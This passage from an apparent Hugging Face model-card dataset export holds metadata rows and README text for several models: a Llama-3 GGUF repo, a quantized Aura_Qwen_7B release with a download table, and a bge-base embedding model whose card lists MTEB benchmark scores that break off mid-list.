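    "Write Aria's next reply in a chat between Dana and Aria. Write a single reply only."
)
print(prompt)
```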
---
license: other
---
|
Chituyi7/EBO-llama3-8B-4Bit-InstructionTuned-OIG | Chituyi7 | "2024-06-27T09:52:48Z" | 3,608 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"license:mit",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | null | "2024-06-27T08:12:04Z" | ---
license: mit
---
|
mradermacher/Aura_Qwen_7B-GGUF | mradermacher | "2024-06-13T10:28:47Z" | 3,607 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"en",
"base_model:jeiku/Aura_Qwen_7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-13T09:40:28Z" | ---
base_model: jeiku/Aura_Qwen_7B
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/jeiku/Aura_Qwen_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Aura_Qwen_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including how to concatenate multi-part files.
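If you prefer to load a quant programmatically, here is a minimal sketch, assuming the `llama-cpp-python` package is installed and one of the single-file quants from the table below has been downloaded locally:

```python
# Minimal sketch: load one of the single-file quants with llama-cpp-python
# (assumes `pip install llama-cpp-python` and a local copy of the Q4_K_M file).
from llama_cpp import Llama

llm = Llama(model_path="Aura_Qwen_7B.Q4_K_M.gguf", n_ctx=4096)
out = llm("Explain what a GGUF file is in one sentence.", max_tokens=64)
print(out["choices"][0]["text"])
```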
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar-sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q2_K.gguf) | Q2_K | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_XS.gguf) | IQ3_XS | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_S.gguf) | Q3_K_S | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_S.gguf) | IQ3_S | 3.6 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ3_M.gguf) | IQ3_M | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q3_K_L.gguf) | Q3_K_L | 4.2 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.IQ4_XS.gguf) | IQ4_XS | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q5_K_S.gguf) | Q5_K_S | 5.4 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q5_K_M.gguf) | Q5_K_M | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q6_K.gguf) | Q6_K | 6.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Aura_Qwen_7B-GGUF/resolve/main/Aura_Qwen_7B.f16.gguf) | f16 | 15.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
khoa-klaytn/bge-base-en-v1.5-angle | khoa-klaytn | "2024-01-10T03:25:20Z" | 3,604 | 2 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"mteb",
"en",
"arxiv:2310.07554",
"arxiv:2309.07597",
"license:mit",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-embeddings-inference",
"region:us"
] | feature-extraction | "2024-01-10T03:25:15Z" | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
- mteb
model-index:
- name: bge-base-en-v1.5
results:
- task:
type: Classification
dataset:
type: mteb/amazon_counterfactual
name: MTEB AmazonCounterfactualClassification (en)
config: en
split: test
revision: e8379541af4e31359cca9fbcf4b00f2671dba205
metrics:
- type: accuracy
value: 76.14925373134328
- type: ap
value: 39.32336517995478
- type: f1
value: 70.16902252611425
- task:
type: Classification
dataset:
type: mteb/amazon_polarity
name: MTEB AmazonPolarityClassification
config: default
split: test
revision: e2d317d38cd51312af73b3d32a06d1a08b442046
metrics:
- type: accuracy
value: 93.386825
- type: ap
value: 90.21276917991995
- type: f1
value: 93.37741030006174
- task:
type: Classification
dataset:
type: mteb/amazon_reviews_multi
name: MTEB AmazonReviewsClassification (en)
config: en
split: test
revision: 1399c76144fd37290681b995c656ef9b2e06e26d
metrics:
- type: accuracy
value: 48.846000000000004
- type: f1
value: 48.14646269778261
- task:
type: Retrieval
dataset:
type: arguana
name: MTEB ArguAna
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 40.754000000000005
- type: map_at_10
value: 55.761
- type: map_at_100
value: 56.330999999999996
- type: map_at_1000
value: 56.333999999999996
- type: map_at_3
value: 51.92
- type: map_at_5
value: 54.010999999999996
- type: mrr_at_1
value: 41.181
- type: mrr_at_10
value: 55.967999999999996
- type: mrr_at_100
value: 56.538
- type: mrr_at_1000
value: 56.542
- type: mrr_at_3
value: 51.980000000000004
- type: mrr_at_5
value: 54.208999999999996
- type: ndcg_at_1
value: 40.754000000000005
- type: ndcg_at_10
value: 63.605000000000004
- type: ndcg_at_100
value: 66.05199999999999
- type: ndcg_at_1000
value: 66.12
- type: ndcg_at_3
value: 55.708
- type: ndcg_at_5
value: 59.452000000000005
- type: precision_at_1
value: 40.754000000000005
- type: precision_at_10
value: 8.841000000000001
- type: precision_at_100
value: 0.991
- type: precision_at_1000
value: 0.1
- type: precision_at_3
value: 22.238
- type: precision_at_5
value: 15.149000000000001
- type: recall_at_1
value: 40.754000000000005
- type: recall_at_10
value: 88.407
- type: recall_at_100
value: 99.14699999999999
- type: recall_at_1000
value: 99.644
- type: recall_at_3
value: 66.714
- type: recall_at_5
value: 75.747
- task:
type: Clustering
dataset:
type: mteb/arxiv-clustering-p2p
name: MTEB ArxivClusteringP2P
config: default
split: test
revision: a122ad7f3f0291bf49cc6f4d32aa80929df69d5d
metrics:
- type: v_measure
value: 48.74884539679369
- task:
type: Clustering
dataset:
type: mteb/arxiv-clustering-s2s
name: MTEB ArxivClusteringS2S
config: default
split: test
revision: f910caf1a6075f7329cdf8c1a6135696f37dbd53
metrics:
- type: v_measure
value: 42.8075893810716
- task:
type: Reranking
dataset:
type: mteb/askubuntudupquestions-reranking
name: MTEB AskUbuntuDupQuestions
config: default
split: test
revision: 2000358ca161889fa9c082cb41daa8dcfb161a54
metrics:
- type: map
value: 62.128470519187736
- type: mrr
value: 74.28065778481289
- task:
type: STS
dataset:
type: mteb/biosses-sts
name: MTEB BIOSSES
config: default
split: test
revision: d3fb88f8f02e40887cd149695127462bbcf29b4a
metrics:
- type: cos_sim_pearson
value: 89.24629081484655
- type: cos_sim_spearman
value: 86.93752309911496
- type: euclidean_pearson
value: 87.58589628573816
- type: euclidean_spearman
value: 88.05622328825284
- type: manhattan_pearson
value: 87.5594959805773
- type: manhattan_spearman
value: 88.19658793233961
- task:
type: Classification
dataset:
type: mteb/banking77
name: MTEB Banking77Classification
config: default
split: test
revision: 0fd18e25b25c072e09e0d92ab615fda904d66300
metrics:
- type: accuracy
value: 86.9512987012987
- type: f1
value: 86.92515357973708
- task:
type: Clustering
dataset:
type: mteb/biorxiv-clustering-p2p
name: MTEB BiorxivClusteringP2P
config: default
split: test
revision: 65b79d1d13f80053f67aca9498d9402c2d9f1f40
metrics:
- type: v_measure
value: 39.10263762928872
- task:
type: Clustering
dataset:
type: mteb/biorxiv-clustering-s2s
name: MTEB BiorxivClusteringS2S
config: default
split: test
revision: 258694dd0231531bc1fd9de6ceb52a0853c6d908
metrics:
- type: v_measure
value: 36.69711517426737
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackAndroidRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.327
- type: map_at_10
value: 44.099
- type: map_at_100
value: 45.525
- type: map_at_1000
value: 45.641999999999996
- type: map_at_3
value: 40.47
- type: map_at_5
value: 42.36
- type: mrr_at_1
value: 39.199
- type: mrr_at_10
value: 49.651
- type: mrr_at_100
value: 50.29
- type: mrr_at_1000
value: 50.329
- type: mrr_at_3
value: 46.924
- type: mrr_at_5
value: 48.548
- type: ndcg_at_1
value: 39.199
- type: ndcg_at_10
value: 50.773
- type: ndcg_at_100
value: 55.67999999999999
- type: ndcg_at_1000
value: 57.495
- type: ndcg_at_3
value: 45.513999999999996
- type: ndcg_at_5
value: 47.703
- type: precision_at_1
value: 39.199
- type: precision_at_10
value: 9.914000000000001
- type: precision_at_100
value: 1.5310000000000001
- type: precision_at_1000
value: 0.198
- type: precision_at_3
value: 21.984
- type: precision_at_5
value: 15.737000000000002
- type: recall_at_1
value: 32.327
- type: recall_at_10
value: 63.743
- type: recall_at_100
value: 84.538
- type: recall_at_1000
value: 96.089
- type: recall_at_3
value: 48.065000000000005
- type: recall_at_5
value: 54.519
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackEnglishRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 32.671
- type: map_at_10
value: 42.954
- type: map_at_100
value: 44.151
- type: map_at_1000
value: 44.287
- type: map_at_3
value: 39.912
- type: map_at_5
value: 41.798
- type: mrr_at_1
value: 41.465
- type: mrr_at_10
value: 49.351
- type: mrr_at_100
value: 49.980000000000004
- type: mrr_at_1000
value: 50.016000000000005
- type: mrr_at_3
value: 47.144000000000005
- type: mrr_at_5
value: 48.592999999999996
- type: ndcg_at_1
value: 41.465
- type: ndcg_at_10
value: 48.565999999999995
- type: ndcg_at_100
value: 52.76499999999999
- type: ndcg_at_1000
value: 54.749
- type: ndcg_at_3
value: 44.57
- type: ndcg_at_5
value: 46.759
- type: precision_at_1
value: 41.465
- type: precision_at_10
value: 9.107999999999999
- type: precision_at_100
value: 1.433
- type: precision_at_1000
value: 0.191
- type: precision_at_3
value: 21.423000000000002
- type: precision_at_5
value: 15.414
- type: recall_at_1
value: 32.671
- type: recall_at_10
value: 57.738
- type: recall_at_100
value: 75.86500000000001
- type: recall_at_1000
value: 88.36
- type: recall_at_3
value: 45.626
- type: recall_at_5
value: 51.812000000000005
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackGamingRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 41.185
- type: map_at_10
value: 53.929
- type: map_at_100
value: 54.92
- type: map_at_1000
value: 54.967999999999996
- type: map_at_3
value: 50.70400000000001
- type: map_at_5
value: 52.673
- type: mrr_at_1
value: 47.398
- type: mrr_at_10
value: 57.303000000000004
- type: mrr_at_100
value: 57.959
- type: mrr_at_1000
value: 57.985
- type: mrr_at_3
value: 54.932
- type: mrr_at_5
value: 56.464999999999996
- type: ndcg_at_1
value: 47.398
- type: ndcg_at_10
value: 59.653
- type: ndcg_at_100
value: 63.627
- type: ndcg_at_1000
value: 64.596
- type: ndcg_at_3
value: 54.455
- type: ndcg_at_5
value: 57.245000000000005
- type: precision_at_1
value: 47.398
- type: precision_at_10
value: 9.524000000000001
- type: precision_at_100
value: 1.243
- type: precision_at_1000
value: 0.13699999999999998
- type: precision_at_3
value: 24.389
- type: precision_at_5
value: 16.752
- type: recall_at_1
value: 41.185
- type: recall_at_10
value: 73.193
- type: recall_at_100
value: 90.357
- type: recall_at_1000
value: 97.253
- type: recall_at_3
value: 59.199999999999996
- type: recall_at_5
value: 66.118
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackGisRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.27
- type: map_at_10
value: 36.223
- type: map_at_100
value: 37.218
- type: map_at_1000
value: 37.293
- type: map_at_3
value: 33.503
- type: map_at_5
value: 35.097
- type: mrr_at_1
value: 29.492
- type: mrr_at_10
value: 38.352000000000004
- type: mrr_at_100
value: 39.188
- type: mrr_at_1000
value: 39.247
- type: mrr_at_3
value: 35.876000000000005
- type: mrr_at_5
value: 37.401
- type: ndcg_at_1
value: 29.492
- type: ndcg_at_10
value: 41.239
- type: ndcg_at_100
value: 46.066
- type: ndcg_at_1000
value: 47.992000000000004
- type: ndcg_at_3
value: 36.11
- type: ndcg_at_5
value: 38.772
- type: precision_at_1
value: 29.492
- type: precision_at_10
value: 6.260000000000001
- type: precision_at_100
value: 0.914
- type: precision_at_1000
value: 0.11100000000000002
- type: precision_at_3
value: 15.104000000000001
- type: precision_at_5
value: 10.644
- type: recall_at_1
value: 27.27
- type: recall_at_10
value: 54.589
- type: recall_at_100
value: 76.70700000000001
- type: recall_at_1000
value: 91.158
- type: recall_at_3
value: 40.974
- type: recall_at_5
value: 47.327000000000005
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackMathematicaRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 17.848
- type: map_at_10
value: 26.207
- type: map_at_100
value: 27.478
- type: map_at_1000
value: 27.602
- type: map_at_3
value: 23.405
- type: map_at_5
value: 24.98
- type: mrr_at_1
value: 21.891
- type: mrr_at_10
value: 31.041999999999998
- type: mrr_at_100
value: 32.092
- type: mrr_at_1000
value: 32.151999999999994
- type: mrr_at_3
value: 28.358
- type: mrr_at_5
value: 29.969
- type: ndcg_at_1
value: 21.891
- type: ndcg_at_10
value: 31.585
- type: ndcg_at_100
value: 37.531
- type: ndcg_at_1000
value: 40.256
- type: ndcg_at_3
value: 26.508
- type: ndcg_at_5
value: 28.894
- type: precision_at_1
value: 21.891
- type: precision_at_10
value: 5.795999999999999
- type: precision_at_100
value: 0.9990000000000001
- type: precision_at_1000
value: 0.13799999999999998
- type: precision_at_3
value: 12.769
- type: precision_at_5
value: 9.279
- type: recall_at_1
value: 17.848
- type: recall_at_10
value: 43.452
- type: recall_at_100
value: 69.216
- type: recall_at_1000
value: 88.102
- type: recall_at_3
value: 29.18
- type: recall_at_5
value: 35.347
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackPhysicsRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 30.94
- type: map_at_10
value: 41.248000000000005
- type: map_at_100
value: 42.495
- type: map_at_1000
value: 42.602000000000004
- type: map_at_3
value: 37.939
- type: map_at_5
value: 39.924
- type: mrr_at_1
value: 37.824999999999996
- type: mrr_at_10
value: 47.041
- type: mrr_at_100
value: 47.83
- type: mrr_at_1000
value: 47.878
- type: mrr_at_3
value: 44.466
- type: mrr_at_5
value: 46.111999999999995
- type: ndcg_at_1
value: 37.824999999999996
- type: ndcg_at_10
value: 47.223
- type: ndcg_at_100
value: 52.394
- type: ndcg_at_1000
value: 54.432
- type: ndcg_at_3
value: 42.032000000000004
- type: ndcg_at_5
value: 44.772
- type: precision_at_1
value: 37.824999999999996
- type: precision_at_10
value: 8.393
- type: precision_at_100
value: 1.2890000000000001
- type: precision_at_1000
value: 0.164
- type: precision_at_3
value: 19.698
- type: precision_at_5
value: 14.013
- type: recall_at_1
value: 30.94
- type: recall_at_10
value: 59.316
- type: recall_at_100
value: 80.783
- type: recall_at_1000
value: 94.15400000000001
- type: recall_at_3
value: 44.712
- type: recall_at_5
value: 51.932
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackProgrammersRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.104
- type: map_at_10
value: 36.675999999999995
- type: map_at_100
value: 38.076
- type: map_at_1000
value: 38.189
- type: map_at_3
value: 33.733999999999995
- type: map_at_5
value: 35.287
- type: mrr_at_1
value: 33.904
- type: mrr_at_10
value: 42.55
- type: mrr_at_100
value: 43.434
- type: mrr_at_1000
value: 43.494
- type: mrr_at_3
value: 40.126
- type: mrr_at_5
value: 41.473
- type: ndcg_at_1
value: 33.904
- type: ndcg_at_10
value: 42.414
- type: ndcg_at_100
value: 48.203
- type: ndcg_at_1000
value: 50.437
- type: ndcg_at_3
value: 37.633
- type: ndcg_at_5
value: 39.67
- type: precision_at_1
value: 33.904
- type: precision_at_10
value: 7.82
- type: precision_at_100
value: 1.2409999999999999
- type: precision_at_1000
value: 0.159
- type: precision_at_3
value: 17.884
- type: precision_at_5
value: 12.648000000000001
- type: recall_at_1
value: 27.104
- type: recall_at_10
value: 53.563
- type: recall_at_100
value: 78.557
- type: recall_at_1000
value: 93.533
- type: recall_at_3
value: 39.92
- type: recall_at_5
value: 45.457
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.707749999999997
- type: map_at_10
value: 36.961
- type: map_at_100
value: 38.158833333333334
- type: map_at_1000
value: 38.270333333333326
- type: map_at_3
value: 34.07183333333334
- type: map_at_5
value: 35.69533333333334
- type: mrr_at_1
value: 32.81875
- type: mrr_at_10
value: 41.293
- type: mrr_at_100
value: 42.116499999999995
- type: mrr_at_1000
value: 42.170249999999996
- type: mrr_at_3
value: 38.83983333333333
- type: mrr_at_5
value: 40.29775
- type: ndcg_at_1
value: 32.81875
- type: ndcg_at_10
value: 42.355
- type: ndcg_at_100
value: 47.41374999999999
- type: ndcg_at_1000
value: 49.5805
- type: ndcg_at_3
value: 37.52825
- type: ndcg_at_5
value: 39.83266666666667
- type: precision_at_1
value: 32.81875
- type: precision_at_10
value: 7.382416666666666
- type: precision_at_100
value: 1.1640833333333334
- type: precision_at_1000
value: 0.15383333333333335
- type: precision_at_3
value: 17.134166666666665
- type: precision_at_5
value: 12.174833333333336
- type: recall_at_1
value: 27.707749999999997
- type: recall_at_10
value: 53.945
- type: recall_at_100
value: 76.191
- type: recall_at_1000
value: 91.101
- type: recall_at_3
value: 40.39083333333334
- type: recall_at_5
value: 46.40083333333333
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackStatsRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 26.482
- type: map_at_10
value: 33.201
- type: map_at_100
value: 34.107
- type: map_at_1000
value: 34.197
- type: map_at_3
value: 31.174000000000003
- type: map_at_5
value: 32.279
- type: mrr_at_1
value: 29.908
- type: mrr_at_10
value: 36.235
- type: mrr_at_100
value: 37.04
- type: mrr_at_1000
value: 37.105
- type: mrr_at_3
value: 34.355999999999995
- type: mrr_at_5
value: 35.382999999999996
- type: ndcg_at_1
value: 29.908
- type: ndcg_at_10
value: 37.325
- type: ndcg_at_100
value: 41.795
- type: ndcg_at_1000
value: 44.105
- type: ndcg_at_3
value: 33.555
- type: ndcg_at_5
value: 35.266999999999996
- type: precision_at_1
value: 29.908
- type: precision_at_10
value: 5.721
- type: precision_at_100
value: 0.8630000000000001
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 14.008000000000001
- type: precision_at_5
value: 9.754999999999999
- type: recall_at_1
value: 26.482
- type: recall_at_10
value: 47.072
- type: recall_at_100
value: 67.27
- type: recall_at_1000
value: 84.371
- type: recall_at_3
value: 36.65
- type: recall_at_5
value: 40.774
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackTexRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 18.815
- type: map_at_10
value: 26.369999999999997
- type: map_at_100
value: 27.458
- type: map_at_1000
value: 27.588
- type: map_at_3
value: 23.990000000000002
- type: map_at_5
value: 25.345000000000002
- type: mrr_at_1
value: 22.953000000000003
- type: mrr_at_10
value: 30.342999999999996
- type: mrr_at_100
value: 31.241000000000003
- type: mrr_at_1000
value: 31.319000000000003
- type: mrr_at_3
value: 28.16
- type: mrr_at_5
value: 29.406
- type: ndcg_at_1
value: 22.953000000000003
- type: ndcg_at_10
value: 31.151
- type: ndcg_at_100
value: 36.309000000000005
- type: ndcg_at_1000
value: 39.227000000000004
- type: ndcg_at_3
value: 26.921
- type: ndcg_at_5
value: 28.938000000000002
- type: precision_at_1
value: 22.953000000000003
- type: precision_at_10
value: 5.602
- type: precision_at_100
value: 0.9530000000000001
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 12.606
- type: precision_at_5
value: 9.119
- type: recall_at_1
value: 18.815
- type: recall_at_10
value: 41.574
- type: recall_at_100
value: 64.84400000000001
- type: recall_at_1000
value: 85.406
- type: recall_at_3
value: 29.694
- type: recall_at_5
value: 34.935
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackUnixRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 27.840999999999998
- type: map_at_10
value: 36.797999999999995
- type: map_at_100
value: 37.993
- type: map_at_1000
value: 38.086999999999996
- type: map_at_3
value: 34.050999999999995
- type: map_at_5
value: 35.379
- type: mrr_at_1
value: 32.649
- type: mrr_at_10
value: 41.025
- type: mrr_at_100
value: 41.878
- type: mrr_at_1000
value: 41.929
- type: mrr_at_3
value: 38.573
- type: mrr_at_5
value: 39.715
- type: ndcg_at_1
value: 32.649
- type: ndcg_at_10
value: 42.142
- type: ndcg_at_100
value: 47.558
- type: ndcg_at_1000
value: 49.643
- type: ndcg_at_3
value: 37.12
- type: ndcg_at_5
value: 38.983000000000004
- type: precision_at_1
value: 32.649
- type: precision_at_10
value: 7.08
- type: precision_at_100
value: 1.1039999999999999
- type: precision_at_1000
value: 0.13899999999999998
- type: precision_at_3
value: 16.698
- type: precision_at_5
value: 11.511000000000001
- type: recall_at_1
value: 27.840999999999998
- type: recall_at_10
value: 54.245
- type: recall_at_100
value: 77.947
- type: recall_at_1000
value: 92.36999999999999
- type: recall_at_3
value: 40.146
- type: recall_at_5
value: 44.951
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackWebmastersRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 26.529000000000003
- type: map_at_10
value: 35.010000000000005
- type: map_at_100
value: 36.647
- type: map_at_1000
value: 36.857
- type: map_at_3
value: 31.968000000000004
- type: map_at_5
value: 33.554
- type: mrr_at_1
value: 31.818
- type: mrr_at_10
value: 39.550999999999995
- type: mrr_at_100
value: 40.54
- type: mrr_at_1000
value: 40.596
- type: mrr_at_3
value: 36.726
- type: mrr_at_5
value: 38.416
- type: ndcg_at_1
value: 31.818
- type: ndcg_at_10
value: 40.675
- type: ndcg_at_100
value: 46.548
- type: ndcg_at_1000
value: 49.126
- type: ndcg_at_3
value: 35.829
- type: ndcg_at_5
value: 38.0
- type: precision_at_1
value: 31.818
- type: precision_at_10
value: 7.826
- type: precision_at_100
value: 1.538
- type: precision_at_1000
value: 0.24
- type: precision_at_3
value: 16.601
- type: precision_at_5
value: 12.095
- type: recall_at_1
value: 26.529000000000003
- type: recall_at_10
value: 51.03
- type: recall_at_100
value: 77.556
- type: recall_at_1000
value: 93.804
- type: recall_at_3
value: 36.986000000000004
- type: recall_at_5
value: 43.096000000000004
- task:
type: Retrieval
dataset:
type: BeIR/cqadupstack
name: MTEB CQADupstackWordpressRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 23.480999999999998
- type: map_at_10
value: 30.817
- type: map_at_100
value: 31.838
- type: map_at_1000
value: 31.932
- type: map_at_3
value: 28.011999999999997
- type: map_at_5
value: 29.668
- type: mrr_at_1
value: 25.323
- type: mrr_at_10
value: 33.072
- type: mrr_at_100
value: 33.926
- type: mrr_at_1000
value: 33.993
- type: mrr_at_3
value: 30.436999999999998
- type: mrr_at_5
value: 32.092
- type: ndcg_at_1
value: 25.323
- type: ndcg_at_10
value: 35.514
- type: ndcg_at_100
value: 40.489000000000004
- type: ndcg_at_1000
value: 42.908
- type: ndcg_at_3
value: 30.092000000000002
- type: ndcg_at_5
value: 32.989000000000004
- type: precision_at_1
value: 25.323
- type: precision_at_10
value: 5.545
- type: precision_at_100
value: 0.861
- type: precision_at_1000
value: 0.117
- type: precision_at_3
value: 12.446
- type: precision_at_5
value: 9.131
- type: recall_at_1
value: 23.480999999999998
- type: recall_at_10
value: 47.825
- type: recall_at_100
value: 70.652
- type: recall_at_1000
value: 88.612
- type: recall_at_3
value: 33.537
- type: recall_at_5
value: 40.542
- task:
type: Retrieval
dataset:
type: climate-fever
name: MTEB ClimateFEVER
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 13.333999999999998
- type: map_at_10
value: 22.524
- type: map_at_100
value: 24.506
- type: map_at_1000
value: 24.715
- type: map_at_3
value: 19.022
- type: map_at_5
value: 20.693
- type: mrr_at_1
value: 29.186
- type: mrr_at_10
value: 41.22
- type: mrr_at_100
value: 42.16
- type: mrr_at_1000
value: 42.192
- type: mrr_at_3
value: 38.013000000000005
- type: mrr_at_5
value: 39.704
- type: ndcg_at_1
value: 29.186
- type: ndcg_at_10
value: 31.167
- type: ndcg_at_100
value: 38.879000000000005
- type: ndcg_at_1000
value: 42.376000000000005
- type: ndcg_at_3
value: 25.817
- type: ndcg_at_5
value: 27.377000000000002
- type: precision_at_1
value: 29.186
- type: precision_at_10
value: 9.693999999999999
- type: precision_at_100
value: 1.8030000000000002
- type: precision_at_1000
value: 0.246
- type: precision_at_3
value: 19.11
- type: precision_at_5
value: 14.344999999999999
- type: recall_at_1
value: 13.333999999999998
- type: recall_at_10
value: 37.092000000000006
- type: recall_at_100
value: 63.651
- type: recall_at_1000
value: 83.05
- type: recall_at_3
value: 23.74
- type: recall_at_5
value: 28.655
- task:
type: Retrieval
dataset:
type: dbpedia-entity
name: MTEB DBPedia
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 9.151
- type: map_at_10
value: 19.653000000000002
- type: map_at_100
value: 28.053
- type: map_at_1000
value: 29.709000000000003
- type: map_at_3
value: 14.191
- type: map_at_5
value: 16.456
- type: mrr_at_1
value: 66.25
- type: mrr_at_10
value: 74.4
- type: mrr_at_100
value: 74.715
- type: mrr_at_1000
value: 74.726
- type: mrr_at_3
value: 72.417
- type: mrr_at_5
value: 73.667
- type: ndcg_at_1
value: 54.25
- type: ndcg_at_10
value: 40.77
- type: ndcg_at_100
value: 46.359
- type: ndcg_at_1000
value: 54.193000000000005
- type: ndcg_at_3
value: 44.832
- type: ndcg_at_5
value: 42.63
- type: precision_at_1
value: 66.25
- type: precision_at_10
value: 32.175
- type: precision_at_100
value: 10.668
- type: precision_at_1000
value: 2.067
- type: precision_at_3
value: 47.667
- type: precision_at_5
value: 41.3
- type: recall_at_1
value: 9.151
- type: recall_at_10
value: 25.003999999999998
- type: recall_at_100
value: 52.976
- type: recall_at_1000
value: 78.315
- type: recall_at_3
value: 15.487
- type: recall_at_5
value: 18.999
- task:
type: Classification
dataset:
type: mteb/emotion
name: MTEB EmotionClassification
config: default
split: test
revision: 4f58c6b202a23cf9a4da393831edf4f9183cad37
metrics:
- type: accuracy
value: 51.89999999999999
- type: f1
value: 46.47777925067403
- task:
type: Retrieval
dataset:
type: fever
name: MTEB FEVER
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 73.706
- type: map_at_10
value: 82.423
- type: map_at_100
value: 82.67999999999999
- type: map_at_1000
value: 82.694
- type: map_at_3
value: 81.328
- type: map_at_5
value: 82.001
- type: mrr_at_1
value: 79.613
- type: mrr_at_10
value: 87.07000000000001
- type: mrr_at_100
value: 87.169
- type: mrr_at_1000
value: 87.17
- type: mrr_at_3
value: 86.404
- type: mrr_at_5
value: 86.856
- type: ndcg_at_1
value: 79.613
- type: ndcg_at_10
value: 86.289
- type: ndcg_at_100
value: 87.201
- type: ndcg_at_1000
value: 87.428
- type: ndcg_at_3
value: 84.625
- type: ndcg_at_5
value: 85.53699999999999
- type: precision_at_1
value: 79.613
- type: precision_at_10
value: 10.399
- type: precision_at_100
value: 1.1079999999999999
- type: precision_at_1000
value: 0.11499999999999999
- type: precision_at_3
value: 32.473
- type: precision_at_5
value: 20.132
- type: recall_at_1
value: 73.706
- type: recall_at_10
value: 93.559
- type: recall_at_100
